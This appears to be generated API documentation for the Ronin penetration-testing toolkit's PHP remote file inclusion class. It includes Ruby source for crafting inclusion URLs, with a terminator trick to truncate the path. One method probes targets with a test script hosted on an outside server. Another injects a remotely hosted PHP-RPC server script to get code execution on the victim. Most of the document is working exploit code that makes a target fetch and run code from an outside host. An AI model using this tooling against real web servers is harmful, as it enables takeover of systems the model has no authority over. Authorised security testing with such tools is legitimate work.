Class: Ronin::PHP::RFI

Inherits:
Object
  • Object
show all
Defined in:
lib/ronin/php/rfi/rfi.rb,
lib/ronin/rpc/php/rfi.rb

Constant Summary collapse

TEST_SCRIPT =

Default URL of the RFI Test script

'http://ronin.rubyforge.org/dist/php/rfi/test.php'
CHALLENGE_PREFIX =

Prefix text that will appear before the random RFI challenge string

'PHP RFI Response: '
RPC_SERVER_SCRIPT = 
'http://ronin.rubyforge.org/dist/php/rpc/server.min.php'

Instance Attribute Summary collapse

Instance Method Summary collapse

Constructor Details

#initialize(url, param, options = {}) ⇒ RFI

Creates a new RFI object with the specified url, param and given options.

_options may contain the following keys:

:terminate

Whether or not to terminate the RFI script url with a null byte. Defaults to true.

:test_script

URL of RFI test script. Defaults to TEST_SCRIPT.



61
62
63
64
65
66
67
68
69
70
71
72
 
# File 'lib/ronin/php/rfi/rfi.rb', line 61

def initialize(url,param,options={})
  @url = url
  @param = param

  if options.has_key?(:terminate)
    @terminate = options[:terminate]
  else
    @terminate = true
  end

  @test_script = (options[:test_script] || TEST_SCRIPT)
end

Instance Attribute Details

#paramObject (readonly)

RFI vulnerable query parameter



43
44
45
 
# File 'lib/ronin/php/rfi/rfi.rb', line 43

def param
  @param
end

#terminateObject

Whether to terminate the RFI script url with a null byte



46
47
48
 
# File 'lib/ronin/php/rfi/rfi.rb', line 46

def terminate
  @terminate
end

#test_scriptObject

URL of the RFI Test script



49
50
51
 
# File 'lib/ronin/php/rfi/rfi.rb', line 49

def test_script
  @test_script
end

#urlObject (readonly)

RFI vulnerable url



40
41
42
 
# File 'lib/ronin/php/rfi/rfi.rb', line 40

def url
  @url
end

Instance Method Details

#include(script, options = {}) ⇒ Object

Include the specified RFI script using the given options.



101
102
103
104
105
106
107
108
109
 
# File 'lib/ronin/php/rfi/rfi.rb', line 101

def include(script,options={})
  options = options.merge(:url => url_for(script))

  if options[:method] == :post
    return Net.http_post_body(options)
  else
    return Net.http_get_body(options)
  end
end

#rpc(options = {}) ⇒ Object

Returns an PHP-RPC Client using the RFI vulnerability to inject the PHP-RPC Server script using the given options.

options may contain the following keys:

:server

The URL of the PHP-RPC Server script. Defaults to RPC_SERVER_SCRIPT.



39
40
41
42
43
 
# File 'lib/ronin/rpc/php/rfi.rb', line 39

def rpc(options={})
  server_script = (options[:server] || RPC_SERVER_SCRIPT)

  return RPC::PHP::Client.new(url_for(server_script),options)
end

#terminate?Boolean

Returns true if the RFI script url will be terminated with a null byte, returns false otherwise.

Returns:

  • (Boolean) 


78
79
80
 
# File 'lib/ronin/php/rfi/rfi.rb', line 78

def terminate?
  @terminate == true
end

#url_for(script_url) ⇒ Object

Builds a RFI url to include the specified script_url.



85
86
87
88
89
90
91
92
93
94
95
96
 
# File 'lib/ronin/php/rfi/rfi.rb', line 85

def url_for(script_url)
  script_url = URI(script_url.to_s)
  new_url = URI(@url.to_s)

  new_url.query_params.merge!(script_url.query_params)
  script_url.query_params.clear

  script_url = "#{script_url}?" if terminate?

  new_url.query_params[@param.to_s] = script_url
  return new_url
end

#vulnerable?(options = {}) ⇒ Boolean

Returns true if the url is vulnerable to RFI, returns false otherwise.

Returns:

  • (Boolean) 


115
116
117
118
119
120
121
122
123
 
# File 'lib/ronin/php/rfi/rfi.rb', line 115

def vulnerable?(options={})
  challenge = Chars.alpha_numeric.random_string(10).md5

  test_url = URI(@test_script.to_s)
  test_url.query_params['rfi_challenge'] = challenge

  response = include(test_url,options)
  return response.include?("#{CHALLENGE_PREFIX}#{challenge}")
end